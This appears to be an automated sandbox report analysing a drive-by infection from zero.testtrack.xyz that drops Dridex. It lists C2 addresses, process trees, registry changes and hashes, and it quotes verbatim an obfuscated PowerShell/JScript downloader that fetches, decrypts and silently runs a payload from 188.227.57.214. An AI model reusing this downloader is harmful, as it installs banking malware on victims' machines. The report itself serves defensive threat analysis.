Analysis
-
max time kernel
91s -
max time network
142s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
08-02-2021 23:43
Static task
static1
URLScan task
urlscan1
Sample
http://zero.testtrack.xyz/
General
Malware Config
Extracted
dridex
10111
51.68.224.245:4646
188.165.17.91:8443
173.255.246.77:691
Signatures
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
WerFault.exedescription pid process target process PID 416 created 2492 416 WerFault.exe IEXPLORE.EXE -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\pogps.exe cryptone C:\Users\Admin\AppData\Local\Temp\pogps.exe cryptone -
Processes:
resource yara_rule behavioral1/memory/208-32-0x0000000000400000-0x000000000043D000-memory.dmp dridex_ldr behavioral1/memory/208-34-0x0000000000400000-0x000000000043D000-memory.dmp dridex_ldr -
Blocklisted process makes network request 1 IoCs
Processes:
wscript.exeflow pid process 22 1568 wscript.exe -
Executes dropped EXE 1 IoCs
Processes:
pogps.exepid process 208 pogps.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
pogps.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA pogps.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 416 2492 WerFault.exe IEXPLORE.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
iexplore.exeIEXPLORE.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3514538792" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{FCB1C28E-6A67-11EB-BEBD-5649AA4EDE66} = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30867060" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3514538792" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30867060" iexplore.exe -
Suspicious behavior: EnumeratesProcesses 20 IoCs
Processes:
WerFault.exePowerShell.exepid process 416 WerFault.exe 416 WerFault.exe 416 WerFault.exe 416 WerFault.exe 416 WerFault.exe 416 WerFault.exe 416 WerFault.exe 416 WerFault.exe 416 WerFault.exe 416 WerFault.exe 416 WerFault.exe 416 WerFault.exe 416 WerFault.exe 416 WerFault.exe 416 WerFault.exe 416 WerFault.exe 416 WerFault.exe 648 PowerShell.exe 648 PowerShell.exe 648 PowerShell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
WerFault.exePowerShell.exedescription pid process Token: SeRestorePrivilege 416 WerFault.exe Token: SeBackupPrivilege 416 WerFault.exe Token: SeDebugPrivilege 416 WerFault.exe Token: SeDebugPrivilege 648 PowerShell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
iexplore.exepid process 1028 iexplore.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
iexplore.exeIEXPLORE.EXEpid process 1028 iexplore.exe 1028 iexplore.exe 2492 IEXPLORE.EXE 2492 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
iexplore.exeIEXPLORE.EXEPowerShell.execmd.exewscript.execmd.exedescription pid process target process PID 1028 wrote to memory of 2492 1028 iexplore.exe IEXPLORE.EXE PID 1028 wrote to memory of 2492 1028 iexplore.exe IEXPLORE.EXE PID 1028 wrote to memory of 2492 1028 iexplore.exe IEXPLORE.EXE PID 2492 wrote to memory of 648 2492 IEXPLORE.EXE PowerShell.exe PID 2492 wrote to memory of 648 2492 IEXPLORE.EXE PowerShell.exe PID 2492 wrote to memory of 648 2492 IEXPLORE.EXE PowerShell.exe PID 648 wrote to memory of 904 648 PowerShell.exe cmd.exe PID 648 wrote to memory of 904 648 PowerShell.exe cmd.exe PID 648 wrote to memory of 904 648 PowerShell.exe cmd.exe PID 904 wrote to memory of 1568 904 cmd.exe wscript.exe PID 904 wrote to memory of 1568 904 cmd.exe wscript.exe PID 904 wrote to memory of 1568 904 cmd.exe wscript.exe PID 1568 wrote to memory of 636 1568 wscript.exe cmd.exe PID 1568 wrote to memory of 636 1568 wscript.exe cmd.exe PID 1568 wrote to memory of 636 1568 wscript.exe cmd.exe PID 636 wrote to memory of 208 636 cmd.exe pogps.exe PID 636 wrote to memory of 208 636 cmd.exe pogps.exe PID 636 wrote to memory of 208 636 cmd.exe pogps.exe
Processes
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://zero.testtrack.xyz/1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1028 CREDAT:82945 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe((((\..\PowerShell.exe -Command "<#AAAAAAAAAAAAAAAAAAAAAAAAA ((#>$a = ""Start-Process cmd.exe `"""cmd.exe /q /c cd /d "%tMp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp cvbdfg http://188.227.57.214/?NTcyODI=^&XTBMeA^&oa1n4=xHrQMrXYbRvFFYbfLfjKRqFbNUv^&s2ht4=RGUWVxo2bk63PE5qpZDLGpbD1DBmgqVmAH16-t_d0erFOfQe5zUGwKQFlyYpUV15C8Kr7jkLQyhWfhpOD-xGFNAlEqpGcE7Vt31nwzrVFcMh0wRKFumIG_OkbUVkU4gkjwaqLFaL5^&vSerGMTI1Mg== "1"`"""""" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" cmd.exe /q /c cd /d %tMp% && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y['set'+'Proxy'](n);y.open('GET',k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/['Wait'+'ForResponse']();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e['cha'+'rCodeAt'](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join('')};try{var u=WScript.Echo(),o='Object',A=Math,a=Function('b','return WScript.Create'+o+'(b)');P=(''+WScript).split(' ')[1],M='indexOf',q=a(P+'ing.FileSystem'+o),m=WScript.Arguments,e='WinHTTP',Z='cmd',Q=a('WinHttp.WinHttpRequest.5.1'),j=a('W'+P+'.Shell'),s=a('ADODB.Stream'),x=O(8)+'.',p='exe',n=0,K=WScript[P+'FullName'],E='.'+p;s.Type=2;s.Charset='iso-8859-1';s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]('PE\x00\x00'));s.WriteText(v);if(31^<d){var z=1;x+='dll'}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x='regsvr'+32+E+' /s '+x);j.run(Z+E+' /c '+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp cvbdfg http://188.227.57.214/?NTcyODI=^&XTBMeA^&oa1n4=xHrQMrXYbRvFFYbfLfjKRqFbNUv^&s2ht4=RGUWVxo2bk63PE5qpZDLGpbD1DBmgqVmAH16-t_d0erFOfQe5zUGwKQFlyYpUV15C8Kr7jkLQyhWfhpOD-xGFNAlEqpGcE7Vt31nwzrVFcMh0wRKFumIG_OkbUVkU4gkjwaqLFaL5^&vSerGMTI1Mg== 14⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\wscript.exewsCripT //B //E:JScript 3.tMp cvbdfg http://188.227.57.214/?NTcyODI=&XTBMeA&oa1n4=xHrQMrXYbRvFFYbfLfjKRqFbNUv&s2ht4=RGUWVxo2bk63PE5qpZDLGpbD1DBmgqVmAH16-t_d0erFOfQe5zUGwKQFlyYpUV15C8Kr7jkLQyhWfhpOD-xGFNAlEqpGcE7Vt31nwzrVFcMh0wRKFumIG_OkbUVkU4gkjwaqLFaL5&vSerGMTI1Mg== 15⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c pogps.exe6⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\pogps.exepogps.exe7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2492 -s 24243⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\3.tMpMD5
88acae3e364010e82fb022c29ab69c9d
SHA1043f08caaf36d317c60977dd9bdaa2be62ed54a0
SHA256f14c7ba0240be3456164dd63f53dd4bc7eb34bcdb1ac26e98a623edc0390b56b
SHA51238283522ffc8d6026c6298b3405f4274c833f3bf36d96648c0030d3aacea1a61553cea20ec0307ab6711e77ca5aadb4a7db308ed942434d5c8cf0733a3a4b27c
-
C:\Users\Admin\AppData\Local\Temp\pogps.exeMD5
ef10edc180a8e7ccf3240bbb5a73d08b
SHA1b5acf4ab8d560d36d96e91419ba79f1eff6089cc
SHA256f2033c521ba361036d11483e0097233ec2571f4ba5d44c3e828b9b83d379cfb0
SHA51233fcbeb19040d485fb95588d6e58a800771a9fc74b6e676cc4845c9cb9a633b69642caf2a2691a9f25b2d1596d4df23f90211645bfd50112bdf5369e575e6782
-
C:\Users\Admin\AppData\Local\Temp\pogps.exeMD5
ef10edc180a8e7ccf3240bbb5a73d08b
SHA1b5acf4ab8d560d36d96e91419ba79f1eff6089cc
SHA256f2033c521ba361036d11483e0097233ec2571f4ba5d44c3e828b9b83d379cfb0
SHA51233fcbeb19040d485fb95588d6e58a800771a9fc74b6e676cc4845c9cb9a633b69642caf2a2691a9f25b2d1596d4df23f90211645bfd50112bdf5369e575e6782
-
memory/208-34-0x0000000000400000-0x000000000043D000-memory.dmpFilesize
244KB
-
memory/208-33-0x0000000000670000-0x00000000006AC000-memory.dmpFilesize
240KB
-
memory/208-32-0x0000000000400000-0x000000000043D000-memory.dmpFilesize
244KB
-
memory/208-29-0x0000000000000000-mapping.dmp
-
memory/416-5-0x0000000004260000-0x0000000004261000-memory.dmpFilesize
4KB
-
memory/416-4-0x0000000004260000-0x0000000004261000-memory.dmpFilesize
4KB
-
memory/416-8-0x0000000004660000-0x0000000004661000-memory.dmpFilesize
4KB
-
memory/636-28-0x0000000000000000-mapping.dmp
-
memory/648-19-0x0000000007CB0000-0x0000000007CB1000-memory.dmpFilesize
4KB
-
memory/648-11-0x0000000006CB0000-0x0000000006CB1000-memory.dmpFilesize
4KB
-
memory/648-16-0x0000000007620000-0x0000000007621000-memory.dmpFilesize
4KB
-
memory/648-17-0x0000000006DE0000-0x0000000006DE1000-memory.dmpFilesize
4KB
-
memory/648-18-0x0000000007DA0000-0x0000000007DA1000-memory.dmpFilesize
4KB
-
memory/648-3-0x0000000000000000-mapping.dmp
-
memory/648-20-0x0000000008C50000-0x0000000008C51000-memory.dmpFilesize
4KB
-
memory/648-21-0x0000000008950000-0x0000000008951000-memory.dmpFilesize
4KB
-
memory/648-22-0x0000000008BB0000-0x0000000008BB1000-memory.dmpFilesize
4KB
-
memory/648-23-0x00000000091F0000-0x00000000091F1000-memory.dmpFilesize
4KB
-
memory/648-7-0x000000006EE50000-0x000000006F53E000-memory.dmpFilesize
6.9MB
-
memory/648-9-0x0000000006970000-0x0000000006971000-memory.dmpFilesize
4KB
-
memory/648-14-0x00000000069B0000-0x00000000069B1000-memory.dmpFilesize
4KB
-
memory/648-27-0x00000000069B3000-0x00000000069B4000-memory.dmpFilesize
4KB
-
memory/648-13-0x0000000006E50000-0x0000000006E51000-memory.dmpFilesize
4KB
-
memory/648-12-0x0000000006F30000-0x0000000006F31000-memory.dmpFilesize
4KB
-
memory/648-15-0x00000000069B2000-0x00000000069B3000-memory.dmpFilesize
4KB
-
memory/648-10-0x0000000006FF0000-0x0000000006FF1000-memory.dmpFilesize
4KB
-
memory/904-24-0x0000000000000000-mapping.dmp
-
memory/1568-25-0x0000000000000000-mapping.dmp
-
memory/2492-2-0x0000000000000000-mapping.dmp